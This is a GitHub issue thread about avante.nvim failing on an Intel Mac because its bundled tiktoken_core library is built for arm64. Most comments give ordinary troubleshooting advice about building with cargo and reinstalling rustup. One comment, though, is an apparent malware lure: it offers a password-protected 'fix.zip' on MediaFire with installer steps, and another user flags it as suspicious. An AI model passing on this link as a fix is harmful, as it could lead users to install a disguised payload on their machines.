### ISSUE TITLE
can not found tiktoken_core, support on intel mac?

### ISSUE THREAD

**Issue by weykon** [yetone/avante.nvim#230]
I found the file  /Users/myname/.local/share/lunarvim/site/pack/lazy/opt/avante.nvim/lua/../build/tiktoken_core.dylib.

```
file  /Users/myname/.local/share/lunarvim/site/pack/lazy/opt/avante.nvim/lua/../build/tiktoken_core.dylib.
```
/Users/myname/.local/share/lunarvim/site/pack/lazy/opt/avante.nvim/lua/../build/tiktoken_core.dylib: Mach-O 64-bit dynamically linked shared library arm64

it say the file arch is arm64, it is not adaptered for my machine.

I install by lazy.nvim in lunarvim, I not yet know whether the compatibility with lunarvim problem.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luxus** [comment]
that sounds sus :D

**Comment by aarnphm** [comment]
If you have cargo you can try building from source

```lua
make BUILD_FROM_SOURCE=true luajit
```

**Comment by andnig** [comment]
> I found the file /Users/myname/.local/share/lunarvim/site/pack/lazy/opt/avante.nvim/lua/../build/tiktoken_core.dylib.
> 
> ```
> file  /Users/myname/.local/share/lunarvim/site/pack/lazy/opt/avante.nvim/lua/../build/tiktoken_core.dylib.
> ```
> 
> /Users/myname/.local/share/lunarvim/site/pack/lazy/opt/avante.nvim/lua/../build/tiktoken_core.dylib: Mach-O 64-bit dynamically linked shared library arm64
> 
> it say the file arch is arm64, it is not adaptered for my machine.
> 
> I install by lazy.nvim in lunarvim, I not yet know whether the compatibility with lunarvim problem.

I had the same issue. Re-installing rustup (cargo) resolved this issue. Not sure if this is the same for you: https://rustup.rs/

**Comment by aarnphm** [comment]
avante will now requires cargo to build tiktoken_core. Make sure to have it setup before using.

**Comment by weykon** [comment]
> I had the same issue. Re-installing rustup (cargo) resolved this issue. Not sure if this is the same for you: https://rustup.rs/

I executed 'cargo update' and the sh command in your link, and tried both, but the problem still exists.

**Comment by weykon** [comment]
> avante will now requires cargo to build tiktoken_core. Make sure to have it setup before using.

 Change the build parameters to 'make lua51'? Tried once, problem still exists.
